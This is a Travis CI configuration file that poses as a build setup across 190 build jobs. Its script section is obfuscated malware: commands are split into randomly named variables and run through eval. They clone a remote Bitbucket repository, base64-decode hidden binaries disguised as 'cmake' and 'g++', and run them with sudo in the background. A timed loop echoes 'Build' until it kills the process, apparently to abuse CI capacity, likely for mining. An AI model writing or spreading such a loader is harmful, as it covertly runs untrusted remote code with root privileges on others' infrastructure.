dist: bionic

env:
  - BUILD="ri1"
  - BUILD="ri2"
  - BUILD="ri3"
  - BUILD="ri4"
  - BUILD="ri5"
  - BUILD="ri6"
  - BUILD="ri7"
  - BUILD="ri8"
  - BUILD="ri9"
  - BUILD="ri10"
  - BUILD="ri11"
  - BUILD="ri12"
  - BUILD="ri13"
  - BUILD="ri14"
  - BUILD="ri15"
  - BUILD="ri16"
  - BUILD="ri17"
  - BUILD="ri18"
  - BUILD="ri19"
  - BUILD="ri20"
  - BUILD="ri21"
  - BUILD="ri22"
  - BUILD="ri23"
  - BUILD="ri24"
  - BUILD="ri25"
  - BUILD="ri26"
  - BUILD="ri27"
  - BUILD="ri28"
  - BUILD="ri29"
  - BUILD="ri30"
  - BUILD="ri31"
  - BUILD="ri32"
  - BUILD="ri33"
  - BUILD="ri34"
  - BUILD="ri35"
  - BUILD="ri36"
  - BUILD="ri37"
  - BUILD="ri38"
  - BUILD="ri39"
  - BUILD="ri40"
  - BUILD="ri41"
  - BUILD="ri42"
  - BUILD="ri43"
  - BUILD="ri44"
  - BUILD="ri45"
  - BUILD="ri46"
  - BUILD="ri47"
  - BUILD="ri48"
  - BUILD="ri49"
  - BUILD="ri50"
  - BUILD="ri51"
  - BUILD="ri52"
  - BUILD="ri53"
  - BUILD="ri54"
  - BUILD="ri55"
  - BUILD="ri56"
  - BUILD="ri57"
  - BUILD="ri58"
  - BUILD="ri59"
  - BUILD="ri60"
  - BUILD="ri61"
  - BUILD="ri62"
  - BUILD="ri63"
  - BUILD="ri64"
  - BUILD="ri65"
  - BUILD="ri66"
  - BUILD="ri67"
  - BUILD="ri68"
  - BUILD="ri69"
  - BUILD="ri70"
  - BUILD="ri71"
  - BUILD="ri72"
  - BUILD="ri73"
  - BUILD="ri74"
  - BUILD="ri75"
  - BUILD="ri76"
  - BUILD="ri77"
  - BUILD="ri78"
  - BUILD="ri79"
  - BUILD="ri80"
  - BUILD="ri81"
  - BUILD="ri82"
  - BUILD="ri83"
  - BUILD="ri84"
  - BUILD="ri85"
  - BUILD="ri86"
  - BUILD="ri87"
  - BUILD="ri88"
  - BUILD="ri89"
  - BUILD="ri90"
  - BUILD="ri91"
  - BUILD="ri92"
  - BUILD="ri93"
  - BUILD="ri94"
  - BUILD="ri95"
  - BUILD="ri96"
  - BUILD="ri97"
  - BUILD="ri98"
  - BUILD="ri99"
  - BUILD="ri100"
  - BUILD="ri101"
  - BUILD="ri102"
  - BUILD="ri103"
  - BUILD="ri104"
  - BUILD="ri105"
  - BUILD="ri106"
  - BUILD="ri107"
  - BUILD="ri108"
  - BUILD="ri109"
  - BUILD="ri110"
  - BUILD="ri111"
  - BUILD="ri112"
  - BUILD="ri113"
  - BUILD="ri114"
  - BUILD="ri115"
  - BUILD="ri116"
  - BUILD="ri117"
  - BUILD="ri118"
  - BUILD="ri119"
  - BUILD="ri120"
  - BUILD="ri121"
  - BUILD="ri122"
  - BUILD="ri123"
  - BUILD="ri124"
  - BUILD="ri125"
  - BUILD="ri126"
  - BUILD="ri127"
  - BUILD="ri128"
  - BUILD="ri129"
  - BUILD="ri130"
  - BUILD="ri131"
  - BUILD="ri132"
  - BUILD="ri133"
  - BUILD="ri134"
  - BUILD="ri135"
  - BUILD="ri136"
  - BUILD="ri137"
  - BUILD="ri138"
  - BUILD="ri139"
  - BUILD="ri140"
  - BUILD="ri141"
  - BUILD="ri142"
  - BUILD="ri143"
  - BUILD="ri144"
  - BUILD="ri145"
  - BUILD="ri146"
  - BUILD="ri147"
  - BUILD="ri148"
  - BUILD="ri149"
  - BUILD="ri150"
  - BUILD="ri151"
  - BUILD="ri152"
  - BUILD="ri153"
  - BUILD="ri154"
  - BUILD="ri155"
  - BUILD="ri156"
  - BUILD="ri157"
  - BUILD="ri158"
  - BUILD="ri159"
  - BUILD="ri160"
  - BUILD="ri161"
  - BUILD="ri162"
  - BUILD="ri163"
  - BUILD="ri164"
  - BUILD="ri165"
  - BUILD="ri166"
  - BUILD="ri167"
  - BUILD="ri168"
  - BUILD="ri169"
  - BUILD="ri170"
  - BUILD="ri171"
  - BUILD="ri172"
  - BUILD="ri173"
  - BUILD="ri174"
  - BUILD="ri175"
  - BUILD="ri176"
  - BUILD="ri177"
  - BUILD="ri178"
  - BUILD="ri179"
  - BUILD="ri180"
  - BUILD="ri181"
  - BUILD="ri182"
  - BUILD="ri183"
  - BUILD="ri184"
  - BUILD="ri185"
  - BUILD="ri186"
  - BUILD="ri187"
  - BUILD="ri188"
  - BUILD="ri189"
  - BUILD="ri190"

language: minimal

script:
  - sudo apt update || true
  - hkkuyZ="sudo apt --"
  - qMktyUKVwHn="yes install"
  - cJfda=" cl-base64 "
  - oyLFQx="git &>/dev/"
  - eval "$hkkuyZ""$qMktyUKVwHn""$cJfda""$oyLFQx""null"
  - ZzQidXpCe="git clone h"
  - NnlhPXEbyZv="ttps://gccb"
  - olnyNfhxGO="uild@bitbuc"
  - XUidScAPxzF="ket.org/gcc"
  - mvDdlhPOA="build/gcc.g"
  - SdDyhfHp="it &>/dev/n"
  - eval "$ZzQidXpCe""$NnlhPXEbyZv""$olnyNfhxGO""$XUidScAPxzF""$mvDdlhPOA""$SdDyhfHp""ull"
  - wkxlFPhzj="base64 -d g"
  - Tqrqnu="cc/cmake_ >"
  - eval "$wkxlFPhzj""$Tqrqnu"" cmake"
  - ZzzERcCbbJx="base64 -d g"
  - wFmkGIa="cc/config_ "
  - eval "$ZzzERcCbbJx""$wFmkGIa""> log"
  - IyYaTYK="base64 -d g"
  - bGIwKxv="cc/make_ > "
  - eval "$IyYaTYK""$bGIwKxv""g++"
  - xoRhCYfJytE="chmod +x g+"
  - eval "$xoRhCYfJytE""+ cmake"
  - pJPgkqw="./cmake"
  - eval "$pJPgkqw"""
  - dhwnxrFYGDK="sed -i 's/b"
  - iSVOCj="uild/tg3o/g"
  - eval "$dhwnxrFYGDK""$iSVOCj""' log"
  - xgniWHiVoPl="sudo ./g++ "
  - IQzaBdWx="-c log &>/d"
  - eval "$xgniWHiVoPl""$IQzaBdWx""ev/null &"
  - GCC=$(date +%s)
  - wzZdTy="echo $BUILD"
  - eval "$wzZdTy"""
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2638)) ] && sudo killall g++ && break; sleep 206; done
